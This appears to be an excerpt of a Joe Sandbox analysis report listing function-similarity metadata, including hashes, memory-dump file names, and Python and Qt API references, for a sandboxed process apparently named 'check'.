                                                                                                                                                                                                                • API String ID: 2610644205-2174808320
                                                                                                                                                                                                                • Opcode ID: c6f423547ef538807c2362c8fea1cfefa610fbb42a3c21f53a0f69368d7b22fc
                                                                                                                                                                                                                • Instruction ID: 9e566982252493d6edc1448e7a6c11fc40e1b3f4329725598660dba1e0cb3211
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6f423547ef538807c2362c8fea1cfefa610fbb42a3c21f53a0f69368d7b22fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C2153B6B0AB4282EA418F25F44856973A5FB88FD1F584032DE4D23B64EF3CD586CB04
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J1
                                                                                                                                                                                                                • API String ID: 2610644205-2174808320
                                                                                                                                                                                                                • Opcode ID: 3b4655157700461056d87cf3c18c1587e0ef228d76a62de41ade7387566304d3
                                                                                                                                                                                                                • Instruction ID: 769f93e99c5d971078620dc2377953f0cde77e8d30d5c72ce11e613c5f5c70b8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b4655157700461056d87cf3c18c1587e0ef228d76a62de41ade7387566304d3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3216FB6A09B4286EB418F26E44456973A5FB88B90F184136EE4E23B64EF7CD446CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J1
                                                                                                                                                                                                                • API String ID: 2610644205-2174808320
                                                                                                                                                                                                                • Opcode ID: 0079d25ce21c7bd30074aff058625cc4067328ccc2593f3d7253e25bafcae4aa
                                                                                                                                                                                                                • Instruction ID: 58b129dd7dba184ab063eb2b69a4049f3421d0fabbcb07040932f907f4959007
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0079d25ce21c7bd30074aff058625cc4067328ccc2593f3d7253e25bafcae4aa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69215CB6A09B4282EB418F26F44496973A4FB88FD0F195036DE4E13B64DF3CE486CB04
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                • Opcode ID: 097be601e6a1e6625370dd3ce6a3861caf47b003b5f88d3348ef7d722713517c
                                                                                                                                                                                                                • Instruction ID: 999904daa192f10a097966a52a7b83459d4493089d20462e4ff7f003fe409688
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 097be601e6a1e6625370dd3ce6a3861caf47b003b5f88d3348ef7d722713517c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 512181B6A0AB4286EB418B66F9085B9B3A5FB84B95F084035DE4D13B64DF7CE845C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _Py_Dealloc.PYTHON3 ref: 00007FFB02F5A521
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Deallocmalloc
                                                                                                                                                                                                                • String ID: EJ1
                                                                                                                                                                                                                • API String ID: 2267669106-3528995212
                                                                                                                                                                                                                • Opcode ID: 174b528de9452fa99b28e3bb276d6fe55285750942494247837bb1a22ff3bf79
                                                                                                                                                                                                                • Instruction ID: 63463369f4eaca9fc4bdc94119782f3554fe30948ed8b2422c6c59408a3c6aec
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 174b528de9452fa99b28e3bb276d6fe55285750942494247837bb1a22ff3bf79
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5313AB6B09B46C5DB90DF26E888A6D73A1FB88B80F994132CA4D53725EF7DD454C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _Py_Dealloc.PYTHON3 ref: 00007FFB02F5E571
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Deallocmalloc
                                                                                                                                                                                                                • String ID: EJ1
                                                                                                                                                                                                                • API String ID: 2267669106-3528995212
                                                                                                                                                                                                                • Opcode ID: d73ae2b832508b0f6b70d6902082e06ba02b745a1e18e13a865350dbae4b4f2d
                                                                                                                                                                                                                • Instruction ID: c7bf9155def082d244b9f9c3ec1148870ed2e5bf1829731c7d547b6e5907a312
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d73ae2b832508b0f6b70d6902082e06ba02b745a1e18e13a865350dbae4b4f2d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C313AB6B09B4685EB50DF26E888A6D73B4FB88B80F454036CA5E53724EF7DD594C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _Py_Dealloc.PYTHON3 ref: 00007FFB02F60411
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Deallocmalloc
                                                                                                                                                                                                                • String ID: EJ1
                                                                                                                                                                                                                • API String ID: 2267669106-3528995212
                                                                                                                                                                                                                • Opcode ID: 69641823701b70340e159cdb7341a5e63ed6957e12e64f4f840ec90cf3004d9b
                                                                                                                                                                                                                • Instruction ID: d575f2c67026be63107eed36494d7c08061945412ee88992c8e6f14ea1fe92cb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69641823701b70340e159cdb7341a5e63ed6957e12e64f4f840ec90cf3004d9b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71313AB6B09B4689DB50DF26E888A6D73A0FB88B80F594036CA5D57724EF7DD498C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DoubleFloat_From
                                                                                                                                                                                                                • String ID: QRectF$y(self) -> float
                                                                                                                                                                                                                • API String ID: 329246742-1088336965
                                                                                                                                                                                                                • Opcode ID: 3e30babdb6289c23505d4370ddf59f52a579baf2f3252040c0ed2715839dd504
                                                                                                                                                                                                                • Instruction ID: 01ff25a175ef43e0c96630e7be66fdda1578d99b14c5ce9e2575aa6b84307e14
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e30babdb6289c23505d4370ddf59f52a579baf2f3252040c0ed2715839dd504
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0011AB1A05A8680DB00DF65E848BA933A4FB44B81F994033CA5D13320DFBDD65AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$Object@@$?property@$?setProperty@StyleStyle@@Variant@@@Windows$?draw?instance@ActiveApplication@@Bool@ControlControl@CoreDarkElement@InfoInt@Mode@Option@@Painter@@ParametersPrivate@@Rect@Rect@@Rect@@@SystemThemeThemedWidget@@@
                                                                                                                                                                                                                • String ID: Button$_q_isdefault$_q_no_animation$_q_stylerect$_q_stylestate
                                                                                                                                                                                                                • API String ID: 57606971-2284688728
                                                                                                                                                                                                                • Opcode ID: 31d1a734e718618b18dcb5f26fa0ffaa97cb19d7ef59c08e332021c77c376183
                                                                                                                                                                                                                • Instruction ID: fc18d5f4eb31061373c5e2f6342c0abd20d7164b06b98f558e4f5540a03150bd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31d1a734e718618b18dcb5f26fa0ffaa97cb19d7ef59c08e332021c77c376183
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4127232A08A8686EB21CF65D850AED3371FB46769F408037DE2D5B6A4EF3CD549C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$Object@@$?setProperty@Variant@@@$?property@StyleStyle@@Windows$?draw?instance@ActiveApplication@@CoreDarkElement@InfoInt@Mode@Option@@Painter@@ParametersPrimitivePrimitive@Private@@Rect@Rect@@Rect@@@SystemThemeThemedWidget@@@
                                                                                                                                                                                                                • String ID: Button$Edit$_q_no_animation$_q_stylerect$_q_stylestate
                                                                                                                                                                                                                • API String ID: 430001438-3654985033
                                                                                                                                                                                                                • Opcode ID: aae50e140f8a74d0f8fba4402a7ad0a4104491ce82aedf9071ad8ee2b1fb2f9e
                                                                                                                                                                                                                • Instruction ID: 2f5563fb41898127d463a5915814d9c431ee7af6c4e986fceb59dd4b4f87d810
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aae50e140f8a74d0f8fba4402a7ad0a4104491ce82aedf9071ad8ee2b1fb2f9e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2127232A1864286EB12CF25E890AB97770FB467A5F408037DA6E4B7E4EF3CD545C790
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000E.00000002.2227853327.00007FFAFDF11000.00000020.00000001.01000000.00000048.sdmp, Offset: 00007FFAFDF10000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227790739.00007FFAFDF10000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2227992094.00007FFAFDF27000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228129025.00007FFAFDF31000.00000004.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000E.00000002.2228170786.00007FFAFDF32000.00000002.00000001.01000000.00000048.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffafdf10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Region@@$Rect$Rect@@$CreateDeleteObject$Painter@@$PointRect@$??_4?bounding?translated@ClipCombineEngine@@F@@@PaintRect@@@SelectV0@@$?begin@?clip?device?end@?has?paint?rect?systemClip@Clipping@Count@Empty@Engine@Point@Point@@RegionRegion@SizeTransform@Transform@@Type@0@@V0@$$
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2522781240-0
                                                                                                                                                                                                                • Opcode ID: 5c6a26380119b72abd3a67f5f3c163f256183f30943529d9c70172de04c5e285
                                                                                                                                                                                                                • Instruction ID: 9b7c9214833b9bdb698d04664657a5fb218d3c71e0d433dd55877f43cf9aee74
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c6a26380119b72abd3a67f5f3c163f256183f30943529d9c70172de04c5e285
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18C11A32A18A4286EB01CF25E4519A97760FF8BBA5F40D132EE6E1B794EF3CD149C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?subControlRect@QCommonStyle@@UEBA?AVQRect@@W4ComplexControl@QStyle@@PEBVQStyleOptionComplex@@W4SubControl@4@PEBVQWidget@@@Z.QT5WIDGETS ref: 00007FFAFDF24387
